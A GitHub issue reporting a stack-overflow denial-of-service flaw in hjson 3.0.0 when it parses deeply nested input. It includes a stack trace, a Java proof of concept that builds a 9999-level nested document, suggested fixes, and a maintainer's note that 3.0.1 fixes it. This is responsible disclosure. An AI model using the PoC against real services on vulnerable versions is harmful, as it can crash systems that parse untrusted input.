Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stack overflow error caused by hjson parsing of untrusted JSON String (2) #24

Closed
PoppingSnack opened this issue May 29, 2023 · 1 comment

Comments

@PoppingSnack
Copy link

Stack overflow error caused by hjson parsing of untrusted JSON String

Description

Using hjson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at org.hjson.HjsonParser.read(HjsonParser.java:454)
	at org.hjson.HjsonParser.skipWhiteSpace(HjsonParser.java:411)
	at org.hjson.HjsonParser.readObject(HjsonParser.java:185)
	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)

PoC

        <dependency>
            <groupId>org.hjson</groupId>
            <artifactId>hjson</artifactId>
            <version>3.0.0</version>
        </dependency>
import org.hjson.JsonValue;

public class PoC {

    public final static int TOO_DEEP_NESTING = 9999;
    public final static String TOO_DEEP_DOC = "{" + _nestedDoc(TOO_DEEP_NESTING, "a : { ", "} ", "") + "}";


    public static String _nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        sb.append("\n").append(content).append("\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        String jsonString = TOO_DEEP_DOC;
        JsonValue.readHjson(jsonString);
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))

@PoppingSnack PoppingSnack changed the title Stack overflow error caused by hjson parsing of untrusted JSON String Stack overflow error caused by hjson parsing of untrusted JSON String (2) May 29, 2023
@trobro trobro closed this as completed Aug 12, 2023
@trobro
Copy link
Member

trobro commented Aug 17, 2023

Fixed in release 3.0.1

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants